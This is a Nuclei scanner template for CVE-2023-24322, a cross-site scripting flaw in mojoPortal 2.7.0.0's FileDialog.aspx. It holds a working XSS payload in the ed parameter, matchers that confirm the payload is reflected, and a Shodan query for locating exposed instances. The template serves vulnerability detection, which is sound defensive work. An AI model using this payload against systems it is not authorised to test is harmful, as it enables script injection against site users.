54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: CVE-2023-24322
|
|
|
|
info:
|
|
name: mojoPortal 2.7.0.0 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: |
|
|
mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
|
|
remediation: |
|
|
Upgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md
|
|
- https://github.com/i7MEDIA/mojoportal/
|
|
- https://www.mojoportal.com/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24322
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-24322
|
|
cwe-id: CWE-79
|
|
epss-score: 0.0009
|
|
epss-percentile: 0.37778
|
|
cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: mojoportal
|
|
product: mojoportal
|
|
shodan-query: html:"mojoPortal"
|
|
tags: cve,cve2023,cves,mojoportal,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "javascript:alert('document.domain')"
|
|
- "File Browser"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d4b793962f02a94d8db15533461bce0f9799f188a498b05b38d0da714a23c4ad0220610e78c9f9d83ddf1b56ac0ec677dc3aeec74ce80aee1e69b72de56930a880fb:922c64590222798bb761d5b6d8e72950 |